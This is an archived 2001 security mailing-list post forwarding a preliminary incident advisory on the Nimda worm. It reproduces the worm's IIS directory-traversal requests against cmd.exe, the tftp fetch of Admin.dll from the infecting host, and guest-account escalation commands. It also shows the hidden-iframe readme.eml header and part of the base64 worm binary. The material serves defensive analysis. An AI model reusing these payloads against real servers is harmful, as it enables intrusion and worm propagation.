FYI. I'm sending more data that I've gotten about Nimda.
---------- Forwarded message ----------
Date: Tue, 18 Sep 2001 14:30:06 -0700
From: "Kohlenberg, Toby" <toby.kohlenberg@private>
To: "'toby@private'" <toby@private>
Subject: FW: NIMDA UPDATE 3:28 EDT
-----Original Message-----
From: Vicki Irwin [mailto:vicki@private]
Sent: Tuesday, September 18, 2001 1:15 PM
To: intrusions@private
Subject: NIMDA UPDATE 3:28 EDT
We are having problems posting this to the site, so we
decided to send it out to the list for now.
New IIS "Concept Virus" Worm: NIMDA Propagating Quickly
----------------------------------------------------
UPDATE SUMMARY: A new worm that has been named "Nimda" is
propagating with unprecedented speed across the Internet. The worm
appears to have at least four distinct propagation mechanisms.
****INFORMATION IS PRELIMINARY****
(1) An IIS vulnerability propagation mechanism where the worm
attempts to exploit a large number of IIS vulnerabilities to gain
control of a victim IIS server. Once in control, the worm uses tftp
to fetch its code in a file called Admin.dll from the attacking server.
(2) The worm harvests email addresses from the address book and
potentially the web browser history and sends itself to all addresses
as an attachment called readme.exe. Note that the worm may spoof
the source address on the emails, some have even been received at
incidents.org with source addresses of codered@private and
webmaster@private Other reports indicate that the
spoofed source address of staff@private has also been seen.
It is possible that someone is spoofing these emails intentionally,
so that people will trust the source addresses as they are security
sites.
(3) When a web server is infected, the worm downloads a binary
encoded as a wav file to each client that connects to the server.
The wav file is called readme.eml. Microsoft Internet Explorer will
automatically execute the malicious file.
(4) The worm is network aware and propagates via open shares. It
will propagate to shares that are accessible to username guest
with no password.
The worm appears to prefer to target its neighbors, Code Red II
style, when scanning for vulnerable IIS servers. This can cause
considerable activity on local networks that have several
infected machines.
One classB site has reported their hourly port 80 probe statistics
to us, which are included below. Note how fast the numbers are climbing.
Hour # Bogus Port 80 # Unique Src
EDT Probes Addresses
---- --------------- ------------
00 53773 7152
01 54242 7221
02 52284 7329
03 59353 7314
04 140291 7492
05 100716 7492
06 53492 7263
07 54392 7227
08 54800 7433
09 113276 24396
10 330131 44576
11 369874 45368
12 399321 44430
-------------------------------------------------------
Many people are reporting this morning that a flood of IIS attacks
are hitting their webservers. An short example trace, captured by an
Apache server log, is below:
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-""-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-""-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-"
"-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249 "-" "-"
"GET/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249 "-" "-"
"GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-"
"-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-"
"-"
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-"
"-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249 "-" "-"
Evidently, a new worm is the source of the activity. Once the
worm gains access to a vulnerable IIS webserver, it uses tftp to
fetch a binary called Admin.dll from the infecting host.
An example packet capture of the tftp request is below.
-----------------
09/18-15:18:23.706570
vulnerable:4184 -> attacker:69 UDP TTL:127 TOS:0x0 ID:33619 IpLen:20
DgmLen:46 Len: 26
00 01 41 64 6D 69 6E 2E 64 6C 6C 00 6F 63 74 65 ..Admin.dll.octe
74 00 t.
------------------
Some interesting strings embedded in the Admin.dll binary include
(a more complete list is at the end of this report):
---------------
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
net
-----------------
Also, connecting to an infected webserver using a web
browser results in a attempt to download an executable called
readme.eml. Reports indicate that IE5 will automatically
execute the program, which appears to be mime encoded as a
wav file. The worm forces readme.eml to be sent to each client
that accesses any page on the infected webserver.
The header from readme.eml is below:
-----------------------
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAM5k1DIAAAB/UEUAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
AAAABAAAAAAAAAAAEAEAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA
AACEgQAAUAAAAADgAACIHgAAAAAAAAAAAAAAAAAAAAAAAAAAAQA4CgAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAIQBAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAudGV4dAAAAFZlAAAAEAAAAHAAAAAQAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAq
(more worm code follows) ...
--------------------------------------
Other reports indicate that the worm will email itself to addresses in the
victim machine's address book as an attachment called readme.exe. Further,
the worm appears to be harvesting email addresses from cached web pages.
An example of the subject line of an email carrying the malicious readme.exe
program is below:
-------------
From: infected <infected@private>
Subject:
Øòdesktopdesktopsamplesampledesktopsampledesktopsamplesampledesktop
desktopdesktopdesktopsampledesktopdesktopsampledesktopdesktopdesktop
sampledesktopdesktopsampledesktopsampledesktopsampledesktopsampl
To: recipient <recipient@private>
----------------
The worm is also said to propagate via open network shares or
shares that allow connections via the username guest with no password.
Strings output from readme.exe is below. Notice that the strings contain
the IIS attacks seen in the apache trace, and reference the readme.eml
file which is launched via JavaScript. Also references to Admin.dll are
included. Some reports indicate that several variants (three or more)
of Admin.dll are currently circulating.
All files are currently under analysis. This information is preliminary.
More information will be posted as soon as it becomes available.
Tom Liston has posted some preliminary analysis here:
http://www.incidents.org/archives/intrusions/msg01765.html
Links to AV vendor sites on the topic are here:
Sophos
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
NAI
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209
F-Secure
http://www.f-secure.com/v-descs/nimda.shtml
Symantec
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@private
Interesting readme.exe strings output is below. Note that
the strings output from readme.exe and Admin.dll are identical
in the files we have gathered so far:
[xxx@xxx xxx]# strings Admin.dll >afoo
[xxx@xxx xxx]# strings readme.exe >bfoo
[xxx@xxx xxx]# diff afoo bfoo
[xxx@xxx xxx]#
Interesting readme.exe/Admin.dll strings output
---------------------------------------
strncpy
memset
strcpy
strlen
strtok
memcpy
strchr
strcat
rand
strcmp
_strlwr
strncat
srand
free
sprintf
malloc
atoi
strstr
strrchr
MSVCRT.dll
_initterm
_adjust_fdiv
GetCurrentThreadId
CloseHandle
WriteFile
SetFilePointer
CreateFileA
MoveFileExA
ReadFile
SetFileAttributesA
FindClose
FindNextFileA
FindFirstFileA
WriteProcessMemory
OpenProcess
GetCurrentProcessId
lstrcmpiA
HeapCompact
Sleep
GetTickCount
SetThreadPriority
GetCurrentThread
CreateMutexA
lstrcpyA
GetComputerNameA
LocalFree
lstrlenA
LocalAlloc
CreateThread
ReleaseMutex
WaitForSingleObject
GetDriveTypeA
GetLogicalDrives
GetFileSize
CopyFileA
GetFileAttributesA
SetFileTime
GetFileTime
EndUpdateResourceA
UpdateResourceA
SizeofResource
LockResource
LoadResource
FindResourceA
FreeLibrary
BeginUpdateResourceA
LoadLibraryExA
DeleteFileA
GetTempFileNameA
CreateProcessA
GetModuleFileNameA
GetCurrentDirectoryA
GetCommandLineA
GetTempPathA
GetSystemDirectoryA
GetWindowsDirectoryA
GetModuleHandleA
GetVersionExA
GetProcAddress
LoadLibraryA
GetSystemTime
ExitProcess
HeapDestroy
GetLastError
HeapCreate
WritePrivateProfileStringA
KERNEL32.dll
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
RegEnumKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumValueA
RegSetValueExA
RegQueryValueA
ADVAPI32.dll
System\CurrentControlSet\Services\VxD\MSTCP
NameServer
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
--====_ABC1234567890DEF_====
NUL=
[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\\%s
%ld %ld %ld
%ld %ld
Image Space Exec Write Copy
Image Space Exec Read/Write
Image Space Exec Read Only
Image Space Executable
Image Space Write Copy
Image Space Read/Write
Image Space Read Only
Image Space No Access
Mapped Space Exec Write Copy
Mapped Space Exec Read/Write
Mapped Space Exec Read Only
Mapped Space Executable
Mapped Space Write Copy
Mapped Space Read/Write
Mapped Space Read Only
Mapped Space No Access
Reserved Space Exec Write Copy
Reserved Space Exec Read/Write
Reserved Space Exec Read Only
Reserved Space Executable
Reserved Space Write Copy
Reserved Space Read/Write
Reserved Space Read Only
Reserved Space No Access
Process Address Space
Exec Write Copy
Exec Read/Write
Exec Read Only
Executable
Write Copy
Read/Write
Read Only
No Access
Image
User PC
Thread Details
ID Thread
Priority Current
Context Switches/sec
Start Address
Thread
Page Faults/sec
Virtual Bytes Peak
Virtual Bytes
Private Bytes
ID Process
Elapsed Time
Priority Base
Working Set Peak
Working Set
% User Time
% Privileged Time
% Processor Time
Process
Counter 009
software\microsoft\windows nt\currentversion\perflib\009
Counters
Version
Last Counter
software\microsoft\windows nt\currentversion\perflib
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close
readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
.exe
dontrunold
ioctlsocket
gethostbyname
gethostname
inet_ntoa
inet_addr
ntohl
htonl
ntohs
htons
closesocket
select
sendto
send
recvfrom
recv
bind
connect
socket
__WSAFDIsSet
WSACleanup
WSAStartup
ws2_32.dll
MAPILogoff
MAPISendMail
MAPIFreeBuffer
MAPIReadMail
MAPIFindNext
MAPIResolveName
MAPILogon
MAPI32.DLL
WNetAddConnection2A
WNetCancelConnection2A
WNetOpenEnumA
WNetEnumResourceA
WNetCloseEnum
MPR.DLL
ShellExecuteA
SHELL32.DLL
RegisterServiceProcess
VirtualFreeEx
VirtualQueryEx
VirtualAllocEx
VirtualProtectEx
CreateRemoteThread
HeapCompact
HeapFree
HeapAlloc
HeapDestroy
HeapCreate
KERNEL32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Type
Remark
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$
Parm2enc
Parm1enc
Flags
Path
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
octet
wwwwwp
pwlo
wwww
wwwwwwwwwwx
wwwwwwx
wwwwx
wwwx
lffffff
ffff
ffff
CCCCCC
CCCCCCCCC
NPAD
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
DINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDIN
GXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPA
DDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
DINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
XPADDINGPADDINGXXPADDINGPADDINGX
-----------------------------------------------
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:07 PDT